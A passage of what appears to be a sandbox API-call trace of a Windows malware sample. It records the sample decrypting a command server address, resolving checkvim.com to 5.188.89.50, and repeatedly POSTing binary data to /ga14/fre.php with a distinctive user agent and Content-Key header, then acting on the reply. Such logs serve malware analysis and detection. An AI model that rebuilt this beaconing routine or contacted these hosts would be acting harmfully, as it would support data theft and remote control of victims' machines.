0x76a90000 [0320.073] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.073] GetProcessHeap () returned 0x840000 [0320.073] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0320.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.074] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd88, pdwDataLen=0x19f9a4 | out: pbData=0x87fd88, pdwDataLen=0x19f9a4) returned 1 [0320.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.077] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0320.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.078] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0320.078] GetProcessHeap () returned 0x840000 [0320.078] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0320.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.079] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0320.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.080] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0320.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.081] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0320.081] GetProcessHeap () returned 0x840000 [0320.081] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0320.081] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0320.083] GetProcessHeap () returned 0x840000 [0320.083] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c08 [0320.083] socket (af=2, type=1, protocol=6) returned 0x570 [0320.083] connect (s=0x570, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0320.153] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0320.153] GetProcessHeap () returned 0x840000 [0320.153] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0320.153] GetProcessHeap () returned 0x840000 [0320.153] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0320.154] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0320.155] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0320.155] GetProcessHeap () returned 0x840000 [0320.155] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0320.155] GetProcessHeap () returned 0x840000 [0320.155] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0320.155] GetProcessHeap () returned 0x840000 [0320.155] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f758 [0320.155] GetProcessHeap () returned 0x840000 [0320.155] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0320.156] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0320.156] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0320.156] GetProcessHeap () returned 0x840000 [0320.156] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0320.157] GetProcessHeap () returned 0x840000 [0320.157] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0320.157] send (s=0x570, buf=0x873a58*, len=237, flags=0) returned 237 [0320.157] send (s=0x570, buf=0x87eb58*, len=159, flags=0) returned 159 [0320.157] GetProcessHeap () returned 0x840000 [0320.157] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0320.157] recv (in: s=0x570, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0320.755] GetProcessHeap () returned 0x840000 [0320.755] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0320.755] GetProcessHeap () returned 0x840000 [0320.755] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0320.755] GetProcessHeap () returned 0x840000 [0320.755] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0320.755] GetProcessHeap () returned 0x840000 [0320.755] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0320.756] closesocket (s=0x570) returned 0 [0320.756] GetProcessHeap () returned 0x840000 [0320.756] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c08 | out: hHeap=0x840000) returned 1 [0320.756] GetProcessHeap () returned 0x840000 [0320.756] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0320.756] GetProcessHeap () returned 0x840000 [0320.756] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0320.756] GetProcessHeap () returned 0x840000 [0320.756] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0320.756] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xcf8) returned 0x570 [0320.758] Sleep (dwMilliseconds=0xea60) [0320.762] GetProcessHeap () returned 0x840000 [0320.762] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0320.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.763] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0320.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.768] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0320.775] GetProcessHeap () returned 0x840000 [0320.775] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0320.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.776] CryptImportKey (in: hProv=0x870128, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0320.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.777] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0320.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.778] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.778] GetProcessHeap () returned 0x840000 [0320.778] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0320.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.779] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0320.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.780] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0320.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.781] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0320.781] GetProcessHeap () returned 0x840000 [0320.781] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0320.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.782] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.783] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.784] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.785] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.785] GetProcessHeap () returned 0x840000 [0320.785] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0320.785] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0320.785] GetProcessHeap () returned 0x840000 [0320.785] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0320.785] GetProcessHeap () returned 0x840000 [0320.785] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0320.785] GetProcessHeap () returned 0x840000 [0320.785] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0320.785] GetProcessHeap () returned 0x840000 [0320.785] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0320.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.786] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0320.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.794] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0320.799] GetProcessHeap () returned 0x840000 [0320.799] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0320.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.800] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e730) returned 1 [0320.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.801] CryptSetKeyParam (hKey=0x87e730, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0320.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.802] CryptSetKeyParam (hKey=0x87e730, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.802] GetProcessHeap () returned 0x840000 [0320.802] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0320.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.803] CryptDecrypt (in: hKey=0x87e730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0320.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.804] CryptDestroyKey (hKey=0x87e730) returned 1 [0320.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.805] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0320.805] GetProcessHeap () returned 0x840000 [0320.805] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0320.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.806] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0320.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.807] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0320.808] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.808] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0320.808] GetProcessHeap () returned 0x840000 [0320.808] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0320.808] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0320.809] GetProcessHeap () returned 0x840000 [0320.809] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c88 [0320.809] socket (af=2, type=1, protocol=6) returned 0x574 [0320.810] connect (s=0x574, name=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0320.876] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0320.876] GetProcessHeap () returned 0x840000 [0320.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0320.876] GetProcessHeap () returned 0x840000 [0320.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0320.877] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0320.878] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0320.878] GetProcessHeap () returned 0x840000 [0320.878] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0320.878] GetProcessHeap () returned 0x840000 [0320.878] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0320.878] GetProcessHeap () returned 0x840000 [0320.878] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fd88 [0320.878] GetProcessHeap () returned 0x840000 [0320.878] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0320.879] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0320.880] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0320.880] GetProcessHeap () returned 0x840000 [0320.880] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0320.880] GetProcessHeap () returned 0x840000 [0320.880] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0320.880] send (s=0x574, buf=0x873a58*, len=237, flags=0) returned 237 [0320.880] send (s=0x574, buf=0x87eb58*, len=159, flags=0) returned 159 [0320.880] GetProcessHeap () returned 0x840000 [0320.880] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0320.880] recv (in: s=0x574, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0321.219] GetProcessHeap () returned 0x840000 [0321.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0321.219] GetProcessHeap () returned 0x840000 [0321.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0321.219] GetProcessHeap () returned 0x840000 [0321.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0321.219] GetProcessHeap () returned 0x840000 [0321.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0321.220] closesocket (s=0x574) returned 0 [0321.220] GetProcessHeap () returned 0x840000 [0321.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c88 | out: hHeap=0x840000) returned 1 [0321.220] GetProcessHeap () returned 0x840000 [0321.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0321.220] GetProcessHeap () returned 0x840000 [0321.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0321.220] GetProcessHeap () returned 0x840000 [0321.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0321.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xf04) returned 0x574 [0321.221] Sleep (dwMilliseconds=0xea60) [0321.223] GetProcessHeap () returned 0x840000 [0321.223] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0321.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.224] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0321.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.231] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0321.237] GetProcessHeap () returned 0x840000 [0321.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0321.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.239] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0321.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.240] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0321.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.241] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.241] GetProcessHeap () returned 0x840000 [0321.241] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0321.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.242] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0321.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.243] CryptDestroyKey (hKey=0x87e930) returned 1 [0321.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.244] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0321.244] GetProcessHeap () returned 0x840000 [0321.244] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0321.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.265] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0321.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.266] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0321.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.267] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.268] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.268] GetProcessHeap () returned 0x840000 [0321.268] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0321.269] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0321.269] GetProcessHeap () returned 0x840000 [0321.269] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0321.269] GetProcessHeap () returned 0x840000 [0321.269] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0321.269] GetProcessHeap () returned 0x840000 [0321.269] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0321.269] GetProcessHeap () returned 0x840000 [0321.269] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0321.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.270] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0321.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.275] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0321.283] GetProcessHeap () returned 0x840000 [0321.283] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0321.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.284] CryptImportKey (in: hProv=0x86f8a8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0321.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.285] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0321.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.286] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.286] GetProcessHeap () returned 0x840000 [0321.286] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0321.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.287] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0321.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.288] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0321.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0321.289] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0321.289] GetProcessHeap () returned 0x840000 [0321.289] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0321.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.290] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0321.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.295] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0321.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0321.296] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0321.296] GetProcessHeap () returned 0x840000 [0321.296] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0321.296] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, 